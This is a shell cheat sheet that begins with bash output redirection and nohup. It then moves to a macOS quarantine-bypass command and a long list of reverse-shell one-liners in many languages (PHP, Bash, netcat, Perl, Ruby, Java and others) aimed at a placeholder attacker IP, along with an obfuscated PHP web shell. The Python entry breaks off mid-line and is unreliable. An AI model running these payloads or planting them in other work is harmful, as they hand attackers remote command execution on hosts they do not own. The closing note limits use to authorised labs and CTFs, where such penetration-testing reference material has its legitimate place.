## IO

Bash reserves special symbols that stand in for useful data. A program's output is streamed to two file descriptors, stdout (descriptor 1) and stderr (descriptor 2), and those numbers are how each stream is named in a redirection.

Certain symbols are reserved for redirecting the output of one program into a file or into another program:
| Feature | Syntax | Example | Description |
|---|---|---|---|
| **Pipe** | `\|` | `cat file.txt \| grep "error"` | Sends the output of `cat` into `grep` for filtering. |
| **Redirect (Overwrite)** | `>` | `ls > files.txt` | Writes the output of `ls` into `files.txt`, overwriting it. |
| **Redirect (Append)** | `>>` | `date >> log.txt` | Appends the current date to `log.txt` without erasing previous content. |
| **Redirect (Input)** | `<` | `sort < names.txt` | Feeds the contents of `names.txt` into `sort` as standard input. |
| **Redirect (stderr)** | `2>` | | Redirects output on file handle 2 (usually **stderr**) to a file. |
| **Redirect (stderr to stdout)** | `2>&1` | `ls non-existantflile.dat > all.log 2>&1` | `2>&` redirects file handle 2 (almost always **stderr**) to some other file handle; it is generally written as `2>&1`, which sends stderr to the same place as stdout. |
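As an added example (not part of the original cheat sheet), a POSIX sh script showing why the order of `> file` and `2>&1` matters when capturing a command's output into a log; `both` is a constructed stand-in for any program that writes to both streams:

```sh
#!/bin/sh
# Added example: redirection order with a command that writes to both streams.
# 'both' is a constructed stand-in for any program emitting stdout and stderr.
both() { echo out; echo err >&2; }

# Print what ended up in the file versus what still reached the caller's stdout
# ("terminal"). Lines are joined with commas so each result fits on one line.
report() { printf 'file=%s terminal=%s\n' "$(paste -sd, "$1")" "$(paste -sd, "$2")"; }

# '> file 2>&1': stdout goes to the file first, then stderr is pointed at
# wherever stdout now points, so BOTH streams land in the file.
redirect_then_dup() {
  f=$(mktemp); t=$(mktemp)
  { both >"$f" 2>&1; } >"$t"
  report "$f" "$t"; rm -f "$f" "$t"
}

# '2>&1 > file': stderr is duplicated onto the ORIGINAL stdout first, then only
# stdout is moved to the file, so "err" leaks to the terminal. This is a common
# reason a log file looks clean while the errors scrolled past unrecorded.
dup_then_redirect() {
  f=$(mktemp); t=$(mktemp)
  { both 2>&1 >"$f"; } >"$t"
  report "$f" "$t"; rm -f "$f" "$t"
}

# '2> file' alone: only stderr is captured; normal output still shows.
stderr_only() {
  f=$(mktemp); t=$(mktemp)
  { both 2>"$f"; } >"$t"
  report "$f" "$t"; rm -f "$f" "$t"
}

redirect_then_dup   # file=out,err terminal=
dup_then_redirect   # file=out terminal=err
stderr_only         # file=err terminal=out
```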
To avoid exit signals propagating to child processes of the terminal and shell, run the command with `nohup`, i.e.:

```bash
nohup cmd &
```

To ignore all program output and avoid the `nohup.out` file, redirect stdout and stderr to `/dev/null` like this (with bash):

```bash
nohup cmd &> /dev/null &
```

zsh has a shorthand for this:
```zsh
cmd &|
```

## Bypass macOS untrusted application quarantine

```bash
xattr -cr <name-of-executable>
```

## NetSec

### Set up a netcat listener

```bash
nc -nvlp <port>
```

## Reverse shells
### PHP

```bash
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
```

(Assumes TCP uses file descriptor 3. If it doesn't work, try 4, 5, or 6.)

```php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKING-IP/443 0>&1'");?>
```

```php
<?php exec("/bin/bash -c 'bash -i > /dev/tcp/ATTACKING-IP/1234 0>&1'");
```

```php
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);
```

### Bash
```bash
exec /bin/bash 0&0 2>&0
```

```bash
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
```

```bash
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done
# or:
while read line 0<&5; do $line 2>&5 >&5; done
```

```bash
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
```

### socat
```bash
socat tcp:ip:port exec:'bash -i',pty,stderr,setsid,sigint,sane &
```

### golang
```bash
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go
```

### netcat
```bash
nc -lnvp 80
```

```bash
nc -e /bin/sh ATTACKING-IP 80
```

```bash
/bin/sh | nc ATTACKING-IP 80
```

```bash
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
```

(OpenBSD netcat)

```bash
mkfifo /tmp/lol;nc ATTACKER-IP PORT 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol
```

### Node.js
```javascript
require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/80 0>&1');
```

### telnet
```bash
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
```

```bash
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
```

### Perl Reverse Shell
```bash
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

### Perl Windows Reverse Shell

```perl
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```

### Ruby Reverse Shell

```bash
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

### Java
```java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

### Python

```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,sock
```

## Safety note
Keep security-related snippets for authorised lab boxes, CTFs, or your own systems only. When copying commands from this page, replace placeholders deliberately, run inside a controlled environment, and prefer documenting what the command is meant to test rather than blindly pasting it into a live machine.